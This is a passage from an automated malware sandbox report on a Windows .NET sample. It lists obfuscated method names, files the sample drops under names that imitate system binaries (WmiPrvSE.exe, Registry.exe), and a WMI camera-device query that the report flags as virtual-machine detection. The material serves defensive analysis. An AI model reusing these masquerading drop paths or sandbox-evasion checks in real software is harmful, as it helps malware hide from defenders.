                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, OE9Yx7ojjPCycvM8qUL.csHigh entropy of concatenated method names: 'cwCoD7lOPn', 'AUOoGH6BDO', 'rhwolA0P5m', 'GgPoxfSy1C', 'a3PoBNjWc7', 'eNPofsGfDb', 'bZMoCpnJ0h', 'pmLoLuPCYD', 'HHhoJYVxhC', 'syDo9Ql7rw'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, PPW394mHxidZdgp2AfT.csHigh entropy of concatenated method names: 'q4kiRemjWbO', 'OM0ibMaef2o', 'iJLrcAi4lEwvggcKlB4G', 'R4JTLCi4XcLp1jJ0ByVX', 'cTfO3pi4Gsw9bY2TBKRQ', 'csjDj5i4x3VBa1Nneq6M', 'UkrZm9i4Law4K1dgnOAW', 'boxsWii4fhphMGr6n8NF', 'rpQ61Fi4CDjERBMoXe4M', 'EZgBXdi4Jnx2WT7d1hc1'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, QcWCn5AQk7J6LQfgPRm.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'yXQiRA88Uxo', 'CqDiKiWqhXe', 'A8B3YHiD9qOSAC342kgq', 'a8Is5QiDP8GBhbbQylci', 'amA0bsiD6JpFDHBi0hXo', 'RvvST3iDEc98f7mUtujG'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, IwsR3NQoDCF1qMO98iU.csHigh entropy of concatenated method names: 'segmrQiHIJoJD2qD6div', 'eIiFCUiHVSQ3mojB6tUH', 'IqAYlpiHnwmGNJbAyUHZ', 'YEaxrsYCXs', 'EkVktsiH4W8Zq1Skkc6F', 'eaiA1IiHyVhJlJGdMmos', 'vl7iG8iHggIVXMvDNyow', 'RVA6fjiH2XkNeH2oLZAY', 'u5dJNDiH3hEX0U9gmExq', 'VG3Bi6MNqW'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, v5NP3Oglu3Rl8hsBYUP.csHigh entropy of concatenated method names: 'GBJgfmdXYt', 'UjQg9X1QZG', 'H9NgEw6nBL', 'jGag8q6Dub', 'sj1goxCdKb', 'wmHgvm1KO1', 'gnjgM6ZXgY', 'DUtgenpqYd', 'Dispose', 'M43Akai2f2xZS52ldo3s'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, ANS7OjsI9EglxhYxLwv.csHigh entropy of concatenated method names: 'ut0SZYinQKkmf5hk7khO', 'HZ6YhIincphNjqIO9dcx', 'r42ei9inRP1MQsWyokyA', 'JtcsnKX9Yj', 'Mh9', 'method_0', 'k7psmrxHN4', 'LmTsyE2wLb', 'GK2sgvasd2', 'BG7s4PX6NU'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, cFAxQHZnUQQZy948XNi.csHigh entropy of concatenated method names: 'dBnZyV8jbm', 'tVOZg7H5q7', 'loKZ4K5Xk7', 'dxaZ2Yrp3a', 'c7bZ3XVTiJ', 'lYGfGii13yK05g86r4i8', 'i5uSrii1413OJ1T7JuIR', 'Oqffm5i12TTb7F3IY6p0', 'uaSIsHi1rVYeNMeWISyv', 'B3kS4oi1zeNBiSCD3cxl'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, uiKs7FR7HdPWPECI2NC.csHigh entropy of concatenated method names: 'fhqRNnn80Q', 'CLuR54cpgb', 'SxhRDmvUpk', 'VGNRTL7rPB', 'JTLRhbIOkn', 'DPSRsbSY2q', 'dkraQDis2RlTrM3919lr', 'flThwvis3p3BKcRWS3xZ', 'hbjDMNisrRy8QxG4qGDv', 'w06d7FiszfZvR4iwk63p'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, expQdov0Zp3NKO49vgb.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'XgwvFKDggb', 'hXVv1JUgAj', 'Dispose', 'D31', 'wNK'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, TirpcoLy9kWSULHTq5.csHigh entropy of concatenated method names: 'pSvsMbhdu', 'yoiVtWieDRVkqnNJAnmd', 'R3FGeTieNLiMTZQWOW6Y', 'JT4R4tie5EImXnIIbtRG', 'DYAtuRieTAOdJkx77pGx', 'BHC9g8TLi', 'xEOPno7KS', 'ErZ6uaFIg', 'FncE4tvX5', 'Fe68cbKvh'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, prUK5OPY9a9fU3A6KvH.csHigh entropy of concatenated method names: 'wm9iRCAP6MI', 'PMhPVNVUmt', 'QaTiRLxPp8y', 'c5UMGSipu2AwMlp7dfnY', 'LGOAVRipOjCwCgByxAAl', 'pPevMfipHc634H39lEK4', 'UHtUeoipkrLwyLFYvtkv', 'FKsQpIipp3SgrkEuR3Pd', 'H545FGipwY5BDQ0Rrwrq', 'Hpe7Myip0eo7C0N0HwNC'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, IX8ErRtDP4VfcLrGaGB.csHigh entropy of concatenated method names: 'YxEtpwm8lS', 'dvYtw7rw9r', 'v23VwyiZHvtNAGO2k20v', 'Lsr6IgiZk7DbruIlDyJw', 'SZst1dmv8q', 'zZS86uiZw5BaHaLeissX', 'gfd3ZBiZOCEOL0tnZ9VV', 'fbRjJXiZpyh0EN6fg2Ky', 'JVgT8YiZ0gwetnx1WsI1', 'RnkthkmK6U'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, qMYhJtmDF81ym4v2WIX.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'STwmh85eID', 'DgeUtgigkIfxd6Ftsj7b', 'uylsMKiguSASXB1FxkYG', 'h61WICigOZt1kNbXRmbV', 'obAolZigp3hGfeBo66Aj', 'E5XWQPigwbJ7yn4hUsQG', 't0gtlgig0GQqG0mK3fAU'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, Ed0h5HQxhfw0fw6N2Ee.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'VLOZigiS05yB0oCNu1gC', 'MQJFLDiSqU6mbeSwF0eJ', 'W8XPrsiSFEUjlLue8UTT', 'WdVbHyiS14NWhN3pN3op'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, heIr0yeDY5Z9CUyWvHP.csHigh entropy of concatenated method names: 'method_0', 'Y05ehDRGjP', 'tskes1OZ6X', 'G2leSVQI28', 'L16eUpgsry', 'VyQeH5PYuI', 'L7KekHdCAD', 'W9aZNKiFhhcdcrCrqVYN', 'zahjvViFDn7FDLEyrJaF', 'FdT0ZmiFTWmyr8a946vn'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, b4yR8vc9jZANl3E7ujT.csHigh entropy of concatenated method names: 'zfvcZopy0e', 'S0CRqFih1ChAawh3G7P8', 'kjR3u2ihqAwSi16bCeU2', 'hFKZsaihFiJh0I35s1jP', 'EsbNmGihaImZP6ihNmtH', 'qodyieihYDTFJyBDGrtR', 'memc6gG9OC', 'J7gcE5CdaS', 'RJdc8qGNLp', 'GRKcowSl8h'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, jLWbQEkDAUXZFvKK6XM.csHigh entropy of concatenated method names: 'nahkh7MIK4', 'L69ksnFitn', 'RqIkSmfZK0', 'Y59kUOujB5', 'Y8FkHav8By', 'kTwkk1c7Y1', 'Fh2kuN8d6O', 'ujTkORQRFl', 'pBdkpFyI7K', 'VSckwwnIbf'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, kMy52h6fVRo22ygaeyC.csHigh entropy of concatenated method names: 'TnvYbqiwTSOmjeXpH8RE', 'KniXnxiwhh3EHCWFmnjy', 'JN93vHiwsGiNPRXiYj9I', 'AKUE6uiw59aNeKqihA93', 'ncCmAbiwDGGomHYxA3re', 'method_0', 'method_1', 'Hc26LvxnOX', 'j7D6JZO41l', 'O0D69U16bc'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, gUxiPUKTZuAVfn9uXkj.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'yxoiRK9Uajc', 'CqDiKiWqhXe', 'iODOHgi5DL5Mpws1DgmB', 'HBRGQxi5TJSNByDqdIds', 'vjBFW6i5hMR4TwVLtBoC', 'WhCRSui5sL7Zr6IS3Fvv', 'e0kHLWi5SqivgWZEJ2Re'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, bv4Oxoci41KI8g1MW5V.csHigh entropy of concatenated method names: 'sIicW9jsRM', 'YM1cK1MdrU', 'oQHcAWhL7i', 'cgXoCLihjZEl4h2L6BHq', 'OV4gY4ihRN4O6jmXIUyZ', 'gdb3WnihQveQWfdWVys0', 'OevvaqihXg8GcRfySelC', 'I9PLHSihGYvvZ6aNROcr', 'vmO8GPihlU0kqXsMVr09', 'kWEDvOihxu1nvb6aLIik'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, GcRnKCimq6uiFD1blHJ.csHigh entropy of concatenated method names: 'P9X', 'uMEig5lVbx', 'BQZiRdNSeUF', 'imethod_0', 'Trfi4NAysv', 'VFM45ci7gUVvfTakeSRW', 'BRMgPui7mIKKXhNO58nx', 'GJNhCKi7yrS5485SnubT', 'AAK3dNi74Qmworx8S8HZ', 'BBnfG1i72i8bssHfhuqT'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, esfy1RbpWnl9y7NHoZX.csHigh entropy of concatenated method names: 'FQDbgvtf3O', 'Shcb4lfrrb', 'zpdb262O6j', 'HWlvVlihAK2Syd29vLwJ', 'Cu1hcxihWMF7d0Q7T7hb', 'VWwFR1ihK6NUA0wYddhu', 'QPiV20ihb4mEtFkpluZZ', 'BOjb0VheUp', 'fkWbqVx37a', 'd16bFBOVTd'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, dDTnjiB8dUI8I7Fl5io.csHigh entropy of concatenated method names: 'alw9lrTGvR', 'HMt9x3dDxb', 'Ai5tcuiOdCWFC7LTnn9P', 'pN2YHhiurYcmx5T5lbs3', 'P8kbSKiuzo9nIO9UiPTk', 'qLyeCRiOiRKpUmqyAYVi', 'yk3jOXiOtHlrYACotXMw', 'tVE99P2ByG', 'YKQVi4iOKVRE0J1kU8lX', 'nOIhAAiOAmKGST4TWJmI'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, NCi8di5rStFNE03Bvhj.csHigh entropy of concatenated method names: 'HhLDdZjkeh', 'zYtDivGpvB', 'Yd7', 'B3SDtFUuJj', 'dwwDWcxnQi', 'TTdDKSLvrq', 'MYxDAB6RYp', 'HcgLXriIAxAxVbWZjGCh', 'rUfoTgiIbP8EIX0uZpq0', 'dNr1AYiIcblHXIweceAP'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, RGxwd6USnG8fAArtWdN.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'qKlsoeinhKOB2YYSh36u', 'Ti1DsyinDjTmhgO1RPEQ', 'YFZGCXinTgbLyE2pniPu'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, r7yo9O7pwfwQpryjkid.csHigh entropy of concatenated method names: 'fRA73xTRcH', 'nRh7zjRAZJ', 'EFT70e7FkU', 'BZX7q8V9Nc', 'J2R7FJ84fJ', 'F4W71nnJ66', 'yPi7abUC0M', 'y5C7YuTEmn', 'SPr7I3sacq', 't487VXgRDp'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, yNIqqnu4N1WMasyQ5ZL.csHigh entropy of concatenated method names: 'HWiu30gUGP', 'p3LurOivtr', 'NwduzMJF4K', 'aBmOdTEIZd', 'yl7OijUJh7', 'knWOtGeeIN', 'IZwOWDlY7P', 'dktOKImpnA', 'vqnOAHZvhE', 'iXtOb7uWeq'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, q5dhE75qESCDD4KbAnC.csHigh entropy of concatenated method names: 'vph51QM2Vf', 'fqC5ayuZxh', 'zbj5Yi5iox', 'Jq65IWfdyl', 'XiQ5VWbl53', 'pvWkI9iY2let7LGhsxKV', 'YYoHTbiY3ccKq5tAXVLg', 'nAHa0aiYgRNvCj2LCcwW', 'm3g7u9iY4mLy41fIVDTW', 'RkvsLTiYrL7hdIeZMQbb'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, ufZQmXNDfqEdH9N07hc.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, r27OAmNOhyX1ZwTkDjJ.csHigh entropy of concatenated method names: 'v7BNwTkmtp', 'eNaN0T0Wfu', 'u2oNqmBrqY', 'jEXNFjUxOF', 'q32N1TwDth', 'qVoNa5JUbv', 'YapNY7TMTW', 'XBANIcS6xC', 'MbhNVRmVyq', 'BlnNnq4lxl'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, QM3YPlzdWO4QpIT4rL.csHigh entropy of concatenated method names: 'J6diiiga0y', 'nSyiW9pogY', 'xKJiKRBatv', 'vMxiAhERF5', 'wyKibniIK6', 'tv7icf5X8G', 'q4CiQjucUX', 'C1LMM2i7cdL5ljuaIZZn', 'Qb6cnvi7RJyApGJdmlOx', 'fVNkrbi7QtfDkNeRcBwI'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, Or6VDIAsAiZhtgCW6gq.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'ua0iKXtLq6V', 'airAUHV6uW', 'imethod_0', 'q3lPTOiDqfkE4fdA80bn', 'Kcw0msiDFfcB9igN1YMd', 'hd1QHwiD1SiAcqUCuKyn', 'xxToDniDa4mTBELjAQN4'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, diZM9xcDK5vewXQHkLY.csHigh entropy of concatenated method names: 'zLxchsra6e', 'R3ecsPeStj', 'Xror1ZihmmVABYbjl6Im', 'ctF5P5ihV0kaMMDQTJyB', 'Qd6k6dihn3Sontr9JKPb', 'jet3icihy8gYYn4hJyhL', 'RPSXiRihgmlqifn4Q8L9', 'BmlxJYih4e9mJJOfNVau', 'uKsgE7ih2haIy66on838', 'kZtrXHih3AGKLODO2vN0'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, Lvb8kSWePPbLOXlbbqR.csHigh entropy of concatenated method names: 'qZnWwGfmTc', 'xYCW0AQqcG', 'nWWWq78g5T', 'Bdr3XAiNqBERXK2vwvEp', 'v7bRADiNwLDxfvV955ZZ', 'BYsg5CiN0NnZ6MotMyyO', 'qwAWZnrYqK', 'mFWWNuUYwl', 'Ti7W54by14', 'sJZWDdiBSP'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, qcue7QhI19OPcfRR5ha.csHigh entropy of concatenated method names: 'gHphn51rJ7', 'k6r', 'ueK', 'QH3', 'jiyhm31Q4P', 'Flush', 'WmRhygpXha', 'Jv5hg1NT9k', 'Write', 'kQsh4mXyLL'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, IE8XdMuDjPL7ULehOt0.csHigh entropy of concatenated method names: 'cfGuhKnfDc', 'TRTusw8W1m', 'Xm0uS9lTBs', 'o2yuUdtRBE', 'gDkuH4TZM6', 'NfkukuG82Z', 'RDMuuo6T1S', 'kiRuOb0Hh7', 'uKcupmmiS7', 'gE3uw1JEma'
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\kRoaRVhtzmWNJQRz.exeJump to dropped file
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeFile created: C:\ComponentSavesinto\fontReviewsavesinto.exeJump to dropped file
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Recovery\Registry.exeJump to dropped file
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeJump to dropped file
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\ComponentSavesinto\WmiPrvSE.exeJump to dropped file
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
